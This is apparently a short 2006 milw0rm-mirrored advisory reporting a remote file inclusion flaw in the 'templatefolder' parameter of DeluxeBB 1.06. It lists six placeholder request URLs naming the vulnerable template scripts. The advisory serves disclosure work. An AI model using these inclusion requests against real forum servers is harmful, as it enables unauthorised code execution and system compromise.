DeluxeBB 1.06 templatefolder Remote File Include Vulnerabilities by h3m4n

VIEWS: 34 PAGES: 1

									                    DeluxeBB 1.06 templatefolder Remote File Include Vulnerabilities   Page 1/1
  1    Secunia Research has discovered some vulnerabilities in DeluxeBB,
  2    which can be exploited by malicious people to conduct SQL injection
  3    attacks and compromise a vulnerable system.
  4
  5    1) Input passed to the "templatefolder" parameter in various scripts
  6    isn’t properly verified, before it is used to include files. This can
  7    be exploited to include arbitrary files from external and local
  8    resources.
  9
  10   Examples:
  11   http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
  12   http://[host]/templates/deluxe/posting.php?templatefolder=[file]
  13   http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
  14   http://[host]/templates/default/postreply.php?templatefolder=[file]
  15   http://[host]/templates/default/posting.php?templatefolder=[file]
  16   http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
  17
  18   # milw0rm.com [2006−06−15]




Andreas Sandblad                                                                       06/15/2006

								
To top